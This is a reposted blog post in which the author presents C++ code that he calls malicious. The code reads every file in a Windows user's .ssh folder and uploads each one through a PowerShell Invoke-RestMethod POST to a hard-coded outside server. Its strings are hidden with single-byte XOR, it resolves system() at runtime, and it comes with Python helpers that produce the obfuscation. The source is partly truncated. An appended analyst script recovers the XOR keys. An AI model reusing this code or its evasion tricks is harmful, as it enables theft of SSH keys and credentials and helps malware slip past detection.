[Windows C++] Calling PowerShell to upload every file in a given directory
Views: 4205
Published: 2019-05-26

This article is 3448 characters long; reading it takes about 11 minutes.

A malicious code snippet I wrote last week. What it does:

In C++, read every file directly under "C:\Users\thinkycx\.ssh\" (subfolders are not descended into), resolve the address of system with GetProcAddress, and call system dynamically to run a command: a PowerShell upload of each file.

The upload command used to test the PowerShell part; note that \" in the PowerShell string is an escaped ".

powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\known_hosts\""

Because of the competition's requirements, the strings were given a simple XOR obfuscation.

Server-side recvpost.php script:

C++ implementation:

#include
#include
#include
#include
#include
#include
using namespace std;

int main(){
    DIR *dir;
    struct dirent *ptr;
    typedef void (WINAPI *PGNSI)(char *);   // signature used for the resolved system() pointer

    // Plaintext of cmdline, XOR key 0x6d:
    // powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\known_hosts\""
    char cmdline[0x100]="\x1d\x2\x1a\x8\x1f\x1e\x5\x8\x1\x1\x4d\x4f\x24\x3\x1b\x2\x6\x8\x40\x3f\x8\x1e\x19\x20\x8\x19\x5\x2\x9\x4d\x40\x38\x1f\x4\x4d\x31\x4f\x5\x19\x19\x1d\x57\x42\x42\x59\x58\x43\x5e\x5f\x43\x5b\x5b\x43\x5c\x59\x5e\x57\x55\x5d\x5d\x5c\x42\x1f\x8\xe\x1b\x1d\x2\x1e\x19\x43\x1d\x5\x1d\x31\x4f\x4d\x40\x20\x8\x19\x5\x2\x9\x4d\x3d\x2\x1e\x19\x4d\x40\x24\x3\x2b\x4\x1\x8\x4d\x31\x4f\x2e\x57\x31\x38\x1e\x8\x1f\x1e\x31\x19\x5\x4\x3\x6\x14\xe\x15\x31\x43\x1e\x1e\x5\x31";
    //"\x70\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x20\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x52\x65\x73\x74\x4d\x65\x74\x68\x6f\x64\x20\x2d\x55\x72\x69\x20\x5c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x34\x35\x2e\x33\x32\x2e\x36\x36\x2e\x31\x34\x33\x3a\x38\x30\x30\x31\x2f\x72\x65\x63\x76\x70\x6f\x73\x74\x2e\x70\x68\x70\x5c\x22\x20\x2d\x4d\x65\x74\x68\x6f\x64\x20\x50\x6f\x73\x74\x20\x2d\x49\x6e\x46\x69\x6c\x65\x20\x5c\x22\x43\x3a\x5c\x55\x73\x65\x72\x73\x5c\x74\x68\x69\x6e\x6b\x79\x63\x78\x5c\x2e\x73\x73\x68\x5c";

    // Each remaining string is XOR-ed with its own single-byte key.
    char cmdline_end[4] = "\x4d\x33\x33";   // key 0x11: "\x5c\x22\x22"
    char foldername[100] = "\x50\x29\x3c\x46\x60\x76\x61\x60\x3c\x67\x7b\x7a\x7d\x78\x6a\x70\x6b\x3c\x3d\x60\x60\x7b\x3c";   // key 0x13: "\x43\x3a\x2f\x55\x73\x65\x72\x73\x2f\x74\x68\x69\x6e\x6b\x79\x63\x78\x2f\x2e\x73\x73\x68\x2f"
    char msvcrtdll[11] = "\x2e\x30\x35\x20\x31\x37\x6d\x27\x2f\x2f";   // key 0x43: "msvcrt.dll"
    char funcname[7] = "\x64\x6e\x64\x63\x72\x7a";   // key 0x17: "system"
    char payload[0x200]={0};
    int sizeall;
    sizeall = strlen(cmdline);
    for(int i=0; i
    /* ... source truncated here: the decode loops, the LoadLibrary/GetProcAddress
       resolution of system into pGNSI, and the opendir/readdir loop are missing ... */
            d_name,".") || !strcmp(ptr->d_name,"..")){ continue; }
            sprintf(payload,"%s%s%s", cmdline, ptr->d_name,cmdline_end );   // command + file name + closing quotes
            pGNSI(payload);
        }
    }
    return 0;
}

Appendix: the string-conversion scripts.

Convert a string into the "\xAB\xCD" form:

#!/usr/bin/env python3
# coding=utf-8
# Prints the string as a C-style "\xAB\xCD" byte sequence; the last assignment to a wins.
a = r'powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\\'
a = r'C:/Users/thinkycx/.ssh/'
out = ''
for i in a:
    out += "\\x%02x" % ord(i)   # zero-padded so bytes below 0x10 are not space-padded
print(out)

XOR the "\xAB\xCD" bytes with the key and print the result:

#!/usr/bin/env python3
# coding=utf-8
# XOR every byte with a single-byte key and print the obfuscated "\xAB\xCD" form;
# the last assignment to a (and the key 0x6d) is the one actually used.
a = "\x5c\x22\x22"
a = "\x43\x3a\x2f\x55\x73\x65\x72\x73\x2f\x74\x68\x69\x6e\x6b\x79\x63\x78\x2f\x2e\x73\x73\x68\x2f"
a = "msvcrt.dll"
a = "system"
a = "\x70\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x20\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x52\x65\x73\x74\x4d\x65\x74\x68\x6f\x64\x20\x2d\x55\x72\x69\x20\x5c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x34\x35\x2e\x33\x32\x2e\x36\x36\x2e\x31\x34\x33\x3a\x38\x30\x30\x31\x2f\x72\x65\x63\x76\x70\x6f\x73\x74\x2e\x70\x68\x70\x5c\x22\x20\x2d\x4d\x65\x74\x68\x6f\x64\x20\x50\x6f\x73\x74\x20\x2d\x49\x6e\x46\x69\x6c\x65\x20\x5c\x22\x43\x3a\x5c\x55\x73\x65\x72\x73\x5c\x74\x68\x69\x6e\x6b\x79\x63\x78\x5c\x2e\x73\x73\x68\x5c"
print(len(a))
str1 = ''
for i in a:
    c = ord(i) ^ 0x6d
    str1 += "\\x%x" % c
print(str1)
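The same XOR from the analyst's side, as an added example that is not part of the original post: given only the byte blobs from the C++ source above (without the plaintext comments), recover each single-byte key by trying all 256 candidates and keeping those whose output is printable ASCII and contains a crib an analyst expects in loader strings. The blob values are copied from the post; the crib list and the helper names are my own.

```python
"""Recover the per-string XOR keys used by the loader above (added example,
not the post's own code). Each obfuscated string carries its own key, so the
blobs are attacked independently."""

# Byte blobs copied from the C++ source in the post; cmdline_prefix is only
# the first ten bytes of the cmdline array.
BLOBS = {
    "cmdline_prefix": b"\x1d\x02\x1a\x08\x1f\x1e\x05\x08\x01\x01",
    "cmdline_end": b"\x4d\x33\x33",
    "foldername": (b"\x50\x29\x3c\x46\x60\x76\x61\x60\x3c\x67\x7b\x7a"
                   b"\x7d\x78\x6a\x70\x6b\x3c\x3d\x60\x60\x7b\x3c"),
    "msvcrtdll": b"\x2e\x30\x35\x20\x31\x37\x6d\x27\x2f\x2f",
    "funcname": b"\x64\x6e\x64\x63\x72\x7a",
}

# Cribs an analyst expects in a loader's strings (assumed list): a shell name,
# a cmdlet, a DLL suffix, a drive-letter path, a CRT export, an escaped quote.
CRIBS = [b"powershell", b"Invoke-RestMethod", b".dll", b"C:", b"system", b'\\"']

PRINTABLE = set(range(0x20, 0x7F))  # printable ASCII, no control bytes


def xor_decode(blob: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte of the blob."""
    return bytes(b ^ key for b in blob)


def recover_key(blob: bytes, cribs=CRIBS) -> list:
    """Try all 256 keys; return the (key, plaintext) pairs whose output is
    entirely printable ASCII and contains at least one crib."""
    hits = []
    for key in range(256):
        plain = xor_decode(blob, key)
        if all(b in PRINTABLE for b in plain) and any(c in plain for c in cribs):
            hits.append((key, plain.decode("ascii")))
    return hits


def recover_all(blobs=BLOBS) -> dict:
    """Map each blob name to its candidate (key, plaintext) list."""
    return {name: recover_key(blob) for name, blob in blobs.items()}


if __name__ == "__main__":
    for name, hits in recover_all().items():
        for key, plain in hits:
            print(f"{name:15s} key=0x{key:02x} -> {plain!r}")
```

Every blob here resolves to exactly one key (0x6d, 0x11, 0x13, 0x43, 0x17), which is why a different key per string adds little over a single key; even the three-byte cmdline_end falls because its crib is two of its three bytes.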


Reposted from: http://ghmli.baihongyu.com/
